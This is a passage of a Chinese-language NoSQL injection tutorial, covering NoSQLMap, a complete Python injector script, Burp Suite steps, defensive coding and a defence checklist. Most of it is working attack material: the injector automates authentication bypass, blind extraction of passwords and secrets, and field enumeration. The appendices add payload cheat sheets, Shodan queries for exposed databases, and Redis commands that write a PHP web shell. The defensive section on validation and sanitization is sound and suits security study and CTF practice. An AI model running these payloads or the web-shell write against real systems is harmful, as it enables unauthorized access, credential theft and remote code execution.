  -d '{"$expr":{"$gt":["$password",""]}}'

十一、自动化工具使用

11.1 NoSQLMap

# 安装
git clone https://github.com/codingo/NoSQLMap
cd NoSQLMap
pip install -r requirements.txt
python nosqlmap.py

# 交互式菜单使用
# 1. 设置目标(IP/域名/端口)
# 2. 选择注入方式(HTTP GET/POST/Cookie)
# 3. 选择攻击类型(认证绕过/数据枚举)
# 4. 执行攻击

# 命令行模式
python nosqlmap.py --attack 2 --victim target.com \
    --webPort 80 --uri /login \
    --httpMethod POST --postData "username=admin&password=test" \
    --injectedParam password \
    --injectType 1

11.2 手工测试框架

#!/usr/bin/env python3
"""
NoSQL 注入综合测试脚本
支持:认证绕过 / 字段枚举 / 盲注提取
"""
import requests
import string
import time
import json
import argparse
from typing import Optional

class NoSQLInjector:
    def __init__(self, url: str, method: str = "POST",
                 username_field: str = "username",
                 password_field: str = "password",
                 success_indicator: str = "success",
                 delay: float = 3.0):
        self.url = url
        self.method = method.upper()
        self.username_field = username_field
        self.password_field = password_field
        self.success_indicator = success_indicator
        self.delay = delay
        self.session = requests.Session()
        self.session.headers.update({
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0"
        })

    def send_request(self, payload: dict) -> requests.Response:
        """发送注入请求"""
        if self.method == "POST":
            return self.session.post(self.url, json=payload, timeout=self.delay + 5)
        else:
            return self.session.get(self.url, params=payload, timeout=self.delay + 5)

    def check_success(self, response: requests.Response) -> bool:
        """检查请求是否成功(认证绕过)"""
        return self.success_indicator in response.text

    # ── 1. 认证绕过测试 ──
    def test_auth_bypass(self, username: str = "admin") -> bool:
        """测试所有认证绕过 Payload"""
        payloads = [
            {self.username_field: username, self.password_field: {"$ne": "x"}},
            {self.username_field: username, self.password_field: {"$gt": ""}},
            {self.username_field: username, self.password_field: {"$regex": ".*"}},
            {self.username_field: username, self.password_field: {"$exists": True}},
            {self.username_field: {"$ne": ""}, self.password_field: {"$ne": ""}},
            {self.username_field: {"$gt": ""}, self.password_field: {"$gt": ""}},
            {self.username_field: {"$regex": ".*"}, self.password_field: {"$regex": ".*"}},
        ]

        print("[*] 测试认证绕过 Payload...")
        for i, payload in enumerate(payloads):
            try:
                r = self.send_request(payload)
                if self.check_success(r):
                    print(f"[+] 绕过成功!Payload [{i+1}]: {json.dumps(payload)}")
                    return True
                else:
                    print(f"[-] Payload [{i+1}] 失败")
            except Exception as e:
                print(f"[!] 请求错误:{e}")

        return False

    # ── 2. 布尔盲注提取 ──
    def boolean_extract(self, target_field: str,
                         username: str = "admin",
                         max_len: int = 128) -> str:
        """使用 $regex 布尔盲注提取字段值"""
        import re
        CHARSET = string.ascii_letters + string.digits + "!@#$%^&*_-=+{};:<>?/"
        result = ""
        print(f"[*] 布尔盲注提取字段:{target_field}")

        for pos in range(max_len):
            found = False
            for char in CHARSET:
                prefix = result + char
                payload = {
                    self.username_field: username,
                    target_field: {"$regex": f"^{re.escape(prefix)}"}
                }
                try:
                    r = self.send_request(payload)
                    if self.check_success(r):
                        result += char
                        print(f"\r[+] {target_field}: {result}", end="", flush=True)
                        found = True
                        break
                except:
                    continue

            if not found:
                break

        print(f"\n[+] 提取完成:{target_field} = {result}")
        return result

    # ── 3. 时间盲注 ──
    def time_based_check(self, condition: str) -> bool:
        """$where 时间盲注:条件为真时延迟"""
        payload = {
            "$where": f"function(){{ if({condition}){{ sleep({int(self.delay*1000)}); }} return true; }}"
        }
        try:
            start = time.time()
            self.send_request(payload)
            elapsed = time.time() - start
            return elapsed >= self.delay * 0.8
        except requests.exceptions.Timeout:
            return True
        except:
            return False

    def time_extract(self, field: str, max_len: int = 64) -> str:
        """时间盲注逐字符提取"""
        CHARSET = string.ascii_letters + string.digits + "!@#$%^&*_-=+"
        result = ""
        print(f"[*] 时间盲注提取字段:{field}")

        for pos in range(max_len):
            # 先检查是否到达末尾
            if self.time_based_check(f"this.{field}.length <= {pos}"):
                break

            found = False
            for char in CHARSET:
                condition = f"this.{field}.charAt({pos}) == '{char}'"
                if self.time_based_check(condition):
                    result += char
                    print(f"\r[+] {field}: {result}", end="", flush=True)
                    found = True
                    break

            if not found:
                print(f"\n[?] 位置 {pos} 未匹配")
                break

        print(f"\n[+] 完成:{field} = {result}")
        return result

    # ── 4. 字段名枚举 ──
    def enumerate_fields(self, username: str = "admin") -> list:
        """枚举文档中存在的敏感字段"""
        COMMON_FIELDS = [
            "password", "passwd", "pass", "pwd", "secret",
            "token", "api_key", "apikey", "flag", "key",
            "hash", "salt", "admin_password", "is_admin",
            "role", "email", "phone", "credit_card", "ssn",
        ]

        found = []
        print("[*] 枚举字段名...")
        for field in COMMON_FIELDS:
            payload = {
                self.username_field: username,
                field: {"$exists": True}
            }
            try:
                r = self.send_request(payload)
                if self.check_success(r):
                    print(f"[+] 字段存在:{field}")
                    found.append(field)
            except:
                pass

        return found


# 使用示例
if __name__ == "__main__":
    injector = NoSQLInjector(
        url="http://target.com/login",
        method="POST",
        success_indicator="token",  # 登录成功时响应中含 "token"
        delay=3.0
    )

    # 1. 测试认证绕过
    injector.test_auth_bypass(username="admin")

    # 2. 枚举字段
    fields = injector.enumerate_fields()

    # 3. 布尔盲注提取 password
    if "password" in fields:
        pwd = injector.boolean_extract("password")

    # 4. 时间盲注提取 flag
    flag = injector.time_extract("flag")

11.3 Burp Suite 配合使用

Burp Suite 操作流程:

1. 拦截登录请求(Intercept)
   将 Content-Type 改为 application/json
   请求体改为 JSON 格式

2. 发送到 Repeater
   尝试各种操作符注入 Payload
   观察响应差异

3. 使用 Intruder 爆破
   Payload 类型:Simple list
   注入位置:password 字段值
   Payload 列表:
     {"$ne": "x"}
     {"$gt": ""}
     {"$regex": ".*"}
     {"$exists": true}

4. Burp 插件推荐
   - Hackvertor:编码转换(Unicode / URL 编码)
   - JSON Beautifier:格式化 JSON 响应
   - Logger++:记录所有请求日志
   - Turbo Intruder:高速发送时间盲注请求

十二、防御措施

12.1 输入验证与类型检查

// ── Node.js / Mongoose ──

// ❌ 危险:直接使用用户输入
const user = await User.findOne({
    username: req.body.username,
    password: req.body.password
});

// ✅ 安全方法一:严格类型验证
function sanitizeInput(input, expectedType = 'string') {
    if (typeof input !== expectedType) {
        throw new Error(`Invalid input type: expected ${expectedType}`);
    }
    // 检查是否包含 $ 开头的 key(操作符)
    if (typeof input === 'object' && input !== null) {
        for (const key of Object.keys(input)) {
            if (key.startsWith('$')) {
                throw new Error(`Operator injection detected: ${key}`);
            }
        }
    }
    return input;
}

// ✅ 安全方法二:使用 Mongoose Schema 类型约束
const UserSchema = new mongoose.Schema({
    username: { type: String, required: true },  // 强制字符串类型
    password: { type: String, required: true },
});
// Mongoose 会自动将非字符串转换或拒绝
// 但 $ne 等操作符对象仍可能绕过 → 需额外验证

// ✅ 安全方法三:Joi / Yup 等验证库
const Joi = require('joi');
const schema = Joi.object({
    username: Joi.string().alphanum().max(30).required(),
    password: Joi.string().min(8).max(128).required(),
});
const { error, value } = schema.validate(req.body);
if (error) return res.status(400).json({ error: error.details });

// ✅ 安全方法四:使用参数化查询(推荐)
// Mongoose 的 select() + 参数化方式
const user = await User.findOne({
    username: String(req.body.username),    // 强制转字符串
    password: String(req.body.password)    // 强制转字符串
});
# ── Python + PyMongo ──

from pymongo import MongoClient
import re

# ❌ 危险
def login_unsafe(username, password):
    return db.users.find_one({"username": username, "password": password})

# ✅ 安全:类型验证 + 转换
def login_safe(username, password):
    # 确保输入为字符串(非字典/列表等可注入类型)
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("Invalid input type")

    # 长度限制
    if len(username) > 100 or len(password) > 200:
        raise ValueError("Input too long")

    # 字符白名单(可选,视业务需求)
    if not re.match(r'^[a-zA-Z0-9_@.+-]+$', username):
        raise ValueError("Invalid characters in username")

    return db.users.find_one({
        "username": username,
        "password": password
    })

# ✅ 使用密码哈希(避免明文比较)
import bcrypt

def login_with_hash(username, password):
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("Invalid input")

    user = db.users.find_one({"username": username})
    if user and bcrypt.checkpw(password.encode(), user['password']):
        return user
    return None

12.2 禁用危险功能

// ── MongoDB 服务端配置 ──

// mongod.conf - 禁用 Server-Side JavaScript(防止 $where / mapReduce JS 注入)
// MongoDB 3.6+
security:
  javascriptEnabled: false

// 或启动时传参
mongod --noscripting

// ── Mongoose 配置 ──
// 禁用 $where 操作符
mongoose.set('strictQuery', true);  // 严格模式

// 使用 lean() 减少攻击面
const users = await User.find(query).lean();  // 返回纯 JS 对象,而非 Mongoose 文档

// ── Express 中间件 ──
// mongo-sanitize:递归删除所有以 $ 开头的键
const mongoSanitize = require('express-mongo-sanitize');
app.use(mongoSanitize());  // 全局中间件

// 或手动清理
app.use(mongoSanitize({
    replaceWith: '_',  // 将 $ 替换为 _ 而非删除
    allowDots: false,
    onSanitize: ({ req, key }) => {
        console.warn(`Sanitized: ${key}`);
    }
}));
# ── PyMongo 安全配置 ──

def sanitize_query(query: dict) -> dict:
    """递归清理 MongoDB 查询,删除操作符键"""
    if not isinstance(query, dict):
        return query

    sanitized = {}
    for key, value in query.items():
        # 删除以 $ 开头的键(操作符)
        if key.startswith('$'):
            continue
        # 递归处理嵌套
        if isinstance(value, dict):
            sanitized[key] = sanitize_query(value)
        elif isinstance(value, list):
            sanitized[key] = [sanitize_query(item) if isinstance(item, dict) else item
                               for item in value]
        else:
            sanitized[key] = value

    return sanitized

# 使用
raw_query = {"username": "admin", "password": {"$ne": "wrong"}}
safe_query = sanitize_query(raw_query)
# → {"username": "admin"}  ($ne 被清除)

12.3 防御检查清单

输入验证层:
  ✅ 验证所有用户输入的类型(字符串/数字而非对象)
  ✅ 使用白名单字符集限制输入内容
  ✅ 限制输入长度,防止超长字符串
  ✅ 使用 Joi / Zod / Pydantic 等验证库
  ✅ 拒绝包含 $ 前缀键的对象输入

查询构造层:
  ✅ 永远不要将用户输入直接拼接到查询中
  ✅ 使用参数化查询或 ORM 的安全 API
  ✅ 使用 mongo-sanitize / 自定义清理函数
  ✅ 限制查询返回字段(最小化数据暴露)
  ✅ 不在查询中使用 $where / mapReduce(禁用 JS)

数据库配置层:
  ✅ MongoDB:禁用 Server-Side JavaScript(--noscripting)
  ✅ Redis:设置强密码,禁用危险命令,绑定 127.0.0.1
  ✅ ES:启用 X-Pack 安全,禁用动态脚本
  ✅ 所有 NoSQL 数据库:不使用 root/admin 账户运行应用
  ✅ 网络层隔离:NoSQL 端口不对外暴露

监控与审计层:
  ✅ 开启 MongoDB 操作日志(mongod --logLevel 1)
  ✅ 监控异常查询(含 $where / 大量 $regex)
  ✅ 对敏感集合启用访问审计
  ✅ 设置查询超时防止 DoS($where 死循环)
  ✅ 部署 WAF 检测 NoSQL 注入特征字符($ne / $regex 等)

附录

A. 操作符注入速查表

场景 Payload(JSON 格式) 说明
密码绕过($ne) {"password": {"$ne": "x"}} 密码不等于 x
密码绕过($gt) {"password": {"$gt": ""}} 密码大于空字符串
密码绕过($regex) {"password": {"$regex": ".*"}} 密码匹配任意字符
密码绕过($exists) {"password": {"$exists": true}} 密码字段存在
用户枚举($in) {"username": {"$in": ["admin","root"]}} 枚举常见用户名
返回所有用户 {"$where": "1==1"} JS 恒真条件
字段存在检测 {"secret": {"$exists": true}} 检测 secret 字段
正则盲注 {"password": {"$regex": "^a"}} password 以 a 开头
时间盲注 {"$where": "sleep(3000)||1"} 延迟 3 秒
非操作($not) {"password": {"$not": {"$eq": "x"}}} 密码不等于 x(变体)

B. 各数据库默认端口与利用路径

数据库 端口 默认无认证 主要利用路径
MongoDB 27017 旧版本是 操作符注入 / JS 注入
Redis 6379 写 WebShell / crontab / SSH Key
CouchDB 5984 admin party REST API 未授权 / 视图注入
Elasticsearch 9200 旧版本是 数据读取 / Groovy RCE
Cassandra 9042 CQL 注入
Neo4j 7474 有默认密码 Cypher 注入
Memcached 11211 缓存投毒

C. 常用工具速查

# NoSQLMap(综合注入工具)
git clone https://github.com/codingo/NoSQLMap
python nosqlmap.py

# MongoDB 客户端连接测试
mongosh "mongodb://target.com:27017" --eval "db.adminCommand({listDatabases:1})"

# Shodan 搜索(批量发现暴露的 NoSQL)
# MongoDB: port:27017 product:MongoDB

D. CTF Payload 一键速查

# ══ 通用认证绕过 ══
{"username":"admin","password":{"$ne":""}}
{"username":{"$ne":""},"password":{"$ne":""}}
{"username":"admin","password":{"$gt":""}}
{"username":"admin","password":{"$regex":".*"}}
{"$where":"1==1"}

# ══ URL 参数格式 ══
username=admin&password[$ne]=x
username[$ne]=&password[$ne]=
username=admin&password[$regex]=.*

# ══ $where 盲注 ══
{"$where":"this.password[0]=='a'"}
{"$where":"this.password.length>10"}
{"$where":"function(){sleep(3000);return true;}"}

# ══ $expr 替代(MongoDB 3.6+)══
{"$expr":{"$gt":["$password",""]}}
{"$expr":{"$eq":[{"$substr":["$password",0,1]},"a"]}}

# ══ 字段枚举 ══
{"username":"admin","flag":{"$exists":true}}
{"username":"admin","secret":{"$exists":true}}

# ══ Redis 写 Shell(需未授权)══
config set dir /var/www/html
config set dbfilename cmd.php
set x "<?php system($_GET[c]);?>"
save

⚠️ 免责声明:本文档仅供 CTF 竞赛学习、安全研究及授权渗透测试使用。NoSQL 注入漏洞的利用在未经授权的情况下属于违法行为,请在合法合规的环境中学习与实践。